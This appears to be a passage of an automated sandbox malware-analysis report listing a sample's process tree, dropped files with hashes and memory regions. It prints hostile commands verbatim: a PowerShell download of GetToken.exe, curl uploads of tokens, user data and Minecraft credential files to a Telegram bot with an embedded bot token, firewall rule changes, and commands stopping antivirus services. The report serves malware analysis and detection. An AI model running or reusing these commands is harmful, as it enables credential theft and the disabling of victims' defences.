C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K attk1usb.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K attk2usb.cmd2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\loveletter.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\mail.vbs"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K spreadusb.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K spreadusb.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe', 'GetToken.exe')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\Documents\apps.txt"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\GetToken.exeGetToken.exe2⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-Webrequest https://ipv4.wtfismyip.com/text"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Get-ComputerInfo"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-ComputerInfo"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\curl.execurl -s -v -F document=@"apps.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\system32\curl.execurl -s -v -F document=@"userdata.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\system32\curl.execurl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials.bin" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\system32\curl.execurl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials_microsoft_store.bin" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\system32\curl.execurl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\system32\curl.execurl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts_microsoft_store.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\system32\curl.execurl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_product_state.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\system32\curl.execurl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\system32\curl.execurl -s -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825382⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58f954c86495f1256b9f20046a0b487d3
SHA1b40ac4b22b07611c5c34efedca97fc5a8319e9b7
SHA25694cf031ea1a632617548db0089091413f4cbb71ce2048e0aab92f6866ab8306b
SHA512f67333df900d13eef6e01ca6fd2e52efe20a5c85ee6ce43d67f55ef913049149df696e045f45dc614d564afa4b457b365b915dd720b9da369b089ac9cb9b6cea
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD58c463c0d2e5e09dfe4780a7c68876f45
SHA1b68c88c25a1cfe0612bb265b6c8436ad7d534da3
SHA256305fe1882cc0a2d7a3d182cb8d8f73693993c2ecd680310cb5ca74b45b4376cc
SHA5124930a93d84e4a8e024ee2bc83c82cd43674b4c242b5e98d5f8e6a84e0b2b990998dccd9d06962615767fbb5b6bd9633c70b15f197e81da856bba29c18d1791ee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5fe065d0b9f6be1bb97b1a2cdb01bf4c7
SHA10f2e0fd87f0b5b9a44a25d222dd19ac8a97e4bd8
SHA256c2be5ec0339a1095cc2d207ec107ce8ea80bf2fa6708393faf05f52a1514a008
SHA5120e64459fcfe29d67aa23d6687bccfd431e7aa3601b7daf45139a67db5fdfaedb9835b7f37f49e43194b3efa471b3f684fafda950beaa143c9d07ade481181ba4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c9afffd4c93dbf2fc830858e4840ed17
SHA1ca6303fa16d60486fd08095bb49a073497ed61f2
SHA25688e9b5ef68befe59f68f25769adb6af0cd4d8c372ee25a2feec45cb843de804e
SHA512614c8ab791f8bfe09cfe6911f8d29da86d023b5b4ec7d103fb5d9517fb5545c9987df78e417293f18aad2c5c180b4e894c5b56857f7952c139721f7380f22802
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD54f483b4080f0043fa8851faad5fb55c3
SHA175f79addaa55568511c1300782fd8ddb99f8a8e2
SHA256c2f9c0dc6119b6abedf3a6b5566900b02cdc591f42771cfca5d43313abc38c8f
SHA5123f6a689ecfe2a9e4a22959e610c5c698e4856fc86461ce05a3e0aa35fa7994d54de02d2a70945bafe513b59f457d9cae9bac93b1aef7a70da1c6aeaed8dad0bd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
C:\Users\Admin\Desktop\YcynNote.txtFilesize
640B
MD5b2c26154bdc669017e98aa54c9dc0c49
SHA118985b519126f4f6ca8c2f7db223a2a90dca5612
SHA256a424f38d0d0dba797c24a6be515a75e6a0fd377e29d52343e67aa7c3e6b80ee8
SHA512590178760a6cf734d025664187e257f10ea15520e28a090e16c2985e5a70ab46698d13d2ac5caf7aab4155bb4f3f863c6286f539b8f7e97d87b568f885acbe8d
-
C:\Users\Admin\Desktop\loveletter.vbsFilesize
495B
MD5900ead69492d80e48738921eca28b14f
SHA16b51607c54f8e734a7ea47091859c3e8dce6365c
SHA256c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3
SHA5128fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2
-
C:\Users\Admin\Desktop\mail.vbsFilesize
488B
MD588ef4bc3f48eeb97aedadff8f3840980
SHA148e8167bef2562d902885a075f6190d269fd3d35
SHA256b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa
SHA512523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024
-
C:\Users\Admin\Desktop\spreadusb.cmdFilesize
140B
MD5591248610b25d51736f91c45f788cf6e
SHA1b810cf36ed55fa0ea44c2dafb273e2463fbbda56
SHA256cc1baa061feaf3f747f2d932f077629579f5ce7ec6018bbede7a3220a090a5d1
SHA5120cdbe0d5e2f618f9776cc698ca40d028e4cdbc24537179afde3eee08d13921907f34cedb30726858af36f5366d767a19180665053886646a187025e253912b99
-
C:\Users\Admin\Documents\2b2crypt.cmdFilesize
138B
MD58a0e18e8c3724921943bd90e6070dc8e
SHA113ba409f261173c093918af6c786fe6d863164cf
SHA256ac34f2c032a70571a4d51ca8de3c7cee1ba51aadbddb0534fb358e9b312d2ca6
SHA51254c9e4aef02fb333c9e0af9dda2b2dbfe8bc9550f127051238d800e1e927e34ce272e457db591bbd6414d1fc703d5185ca557652e508e5dd3211a013cc85e34a
-
C:\Users\Admin\Documents\2b2crypt.m.cmdFilesize
142B
MD528057d0514c31373a5e6135b7b477196
SHA1719373c153c7a245bdcd6118330e38c15432eb20
SHA2563179106c4ec0e5fe5129399101c20d79dc9504f29a6e5fdbb0b507fa75d9a9eb
SHA51232952350e35b4ccb6115926ea117d3f8cc49d100a2e47a652f69b5c64f7cf2de2771d9b9b46f6d17cb30162e04022d280fb2d5a54ddd3c396b728623e4692596
-
C:\Users\Admin\Documents\GetToken.exeFilesize
8KB
MD52ed86e80ea9b4b95b3e52ed77ea6c401
SHA15032e67b7c84362374b7d52507ab83ae03d7ebff
SHA2566ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
SHA51264fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71
-
C:\Users\Admin\Documents\GetToken.exeFilesize
8KB
MD52ed86e80ea9b4b95b3e52ed77ea6c401
SHA15032e67b7c84362374b7d52507ab83ae03d7ebff
SHA2566ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983
SHA51264fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71
-
C:\Users\Admin\Documents\NoKeyB.exeFilesize
1.2MB
MD56bc9c0340385a1ff2a8dd1b841415211
SHA1f7b4088b012271ed06c24392bbcb5f9eb75219c2
SHA2569df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
SHA5129bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea
-
C:\Users\Admin\Documents\NoKeyB.exeFilesize
1.2MB
MD56bc9c0340385a1ff2a8dd1b841415211
SHA1f7b4088b012271ed06c24392bbcb5f9eb75219c2
SHA2569df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13
SHA5129bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea
-
C:\Users\Admin\Documents\Tokens.txtFilesize
22B
MD53d74b4a3f6053a5a252f4faee7fb157e
SHA1576c1a2892dad89c3b6aba698ee67258be827eaf
SHA256445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139
SHA512dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529
-
C:\Users\Admin\Documents\apps.txtFilesize
8KB
MD56bf4cd4f0d7fe6d03030441cc05d10bc
SHA1cc7017ae89ccd9881675d1374520c73ebfc09ca4
SHA256d96b64543b6a19c6a9e660950d348f1690486ef2a68879f1694cac46158cb106
SHA512fac10fd326830c2247497c59e2f6b391eb34c34bef5baa4a9ec12f60a4aa0342a9d18d81afeb0f476077dfbd6cfd9a3ce313b3f6a1dcb6d968a20c9856c4b883
-
C:\Users\Admin\Documents\userdata.txtFilesize
32KB
MD5819bf2741599fe893802d13bd509d8aa
SHA17962843d92c348e070f247f62f0eabad44b516f4
SHA256e58d567b78941cf8cf5543c77689270ce00cc2cb2307ce6a63adba7eeddd4692
SHA512ed2a1f14e87acc16d7e915263be81e90004fd5419372f8a290389b64ac95aa5653cf746ee57282e5a89a8af825ad41d1d77d03e57178454e7acdaa6198cafd54
-
memory/220-160-0x0000000000000000-mapping.dmp
-
memory/372-159-0x0000000000000000-mapping.dmp
-
memory/740-191-0x0000000000000000-mapping.dmp
-
memory/776-172-0x0000000000000000-mapping.dmp
-
memory/836-141-0x0000000000000000-mapping.dmp
-
memory/840-150-0x0000000000000000-mapping.dmp
-
memory/876-189-0x0000000000000000-mapping.dmp
-
memory/1016-217-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmpFilesize
10.8MB
-
memory/1020-165-0x0000000000000000-mapping.dmp
-
memory/1132-183-0x0000000000000000-mapping.dmp
-
memory/1152-184-0x0000000000000000-mapping.dmp
-
memory/1152-214-0x00000269F3670000-0x00000269F3E16000-memory.dmpFilesize
7.6MB
-
memory/1152-213-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmpFilesize
10.8MB
-
memory/1252-175-0x0000000000000000-mapping.dmp
-
memory/1296-219-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmpFilesize
10.8MB
-
memory/1332-162-0x0000000000000000-mapping.dmp
-
memory/1384-186-0x0000000000000000-mapping.dmp
-
memory/1388-187-0x0000000000000000-mapping.dmp
-
memory/1460-149-0x0000000000000000-mapping.dmp
-
memory/1508-161-0x0000000000000000-mapping.dmp
-
memory/1516-163-0x0000000000000000-mapping.dmp
-
memory/1520-205-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmpFilesize
10.8MB
-
memory/1552-156-0x0000000000000000-mapping.dmp
-
memory/1560-153-0x0000000000000000-mapping.dmp
-
memory/1792-148-0x0000000000000000-mapping.dmp
-
memory/1836-147-0x0000000000000000-mapping.dmp
-
memory/1868-224-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmpFilesize
10.8MB
-
memory/2028-151-0x0000000000000000-mapping.dmp
-
memory/2040-198-0x0000000000000000-mapping.dmp
-
memory/2044-168-0x0000000000000000-mapping.dmp
-
memory/2096-155-0x0000000000000000-mapping.dmp
-
memory/2260-152-0x0000000000000000-mapping.dmp
-
memory/2340-166-0x0000000000000000-mapping.dmp
-
memory/2432-199-0x0000000000000000-mapping.dmp
-
memory/2476-158-0x0000000000000000-mapping.dmp
-
memory/2700-157-0x0000000000000000-mapping.dmp
-
memory/2780-194-0x0000000000000000-mapping.dmp
-
memory/3244-179-0x0000000000000000-mapping.dmp
-
memory/3292-197-0x0000000000000000-mapping.dmp
-
memory/3316-177-0x0000000000000000-mapping.dmp
-
memory/3344-215-0x0000000000C40000-0x0000000000C48000-memory.dmpFilesize
32KB
-
memory/3548-196-0x0000000000000000-mapping.dmp
-
memory/3692-192-0x0000000000000000-mapping.dmp
-
memory/3700-209-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmpFilesize
10.8MB
-
memory/3704-169-0x0000000000000000-mapping.dmp
-
memory/3728-170-0x0000000000000000-mapping.dmp
-
memory/3840-180-0x0000000000000000-mapping.dmp
-
memory/4080-134-0x00007FFE1A080000-0x00007FFE1AB41000-memory.dmpFilesize
10.8MB
-
memory/4080-133-0x0000017038D80000-0x0000017038DA2000-memory.dmpFilesize
136KB
-
memory/4080-132-0x0000000000000000-mapping.dmp
-
memory/4112-154-0x0000000000000000-mapping.dmp
-
memory/4176-146-0x0000000000000000-mapping.dmp
-
memory/4196-143-0x0000000000000000-mapping.dmp
-
memory/4224-144-0x0000000000000000-mapping.dmp
-
memory/4240-131-0x0000000000000000-mapping.dmp
-
memory/4264-174-0x0000000000000000-mapping.dmp
-
memory/4268-145-0x0000000000000000-mapping.dmp
-
memory/4292-142-0x0000000000000000-mapping.dmp
-
memory/4328-193-0x0000000000000000-mapping.dmp
-
memory/4384-188-0x0000000000000000-mapping.dmp
-
memory/4388-173-0x0000000000000000-mapping.dmp
-
memory/4532-135-0x0000000000000000-mapping.dmp
-
memory/4620-182-0x0000000000000000-mapping.dmp
-
memory/4696-195-0x0000000000000000-mapping.dmp
-
memory/4708-139-0x00007FFE1A010000-0x00007FFE1AAD1000-memory.dmpFilesize
10.8MB
-
memory/4708-137-0x0000000000000000-mapping.dmp
-
memory/4720-190-0x0000000000000000-mapping.dmp
-
memory/4820-178-0x0000000000000000-mapping.dmp
-
memory/4868-164-0x0000000000000000-mapping.dmp
-
memory/4888-185-0x0000000000000000-mapping.dmp
-
memory/4924-171-0x0000000000000000-mapping.dmp
-
memory/4936-130-0x0000000000000000-mapping.dmp
-
memory/4948-167-0x0000000000000000-mapping.dmp
-
memory/4996-181-0x0000000000000000-mapping.dmp
-
memory/5008-176-0x0000000000000000-mapping.dmp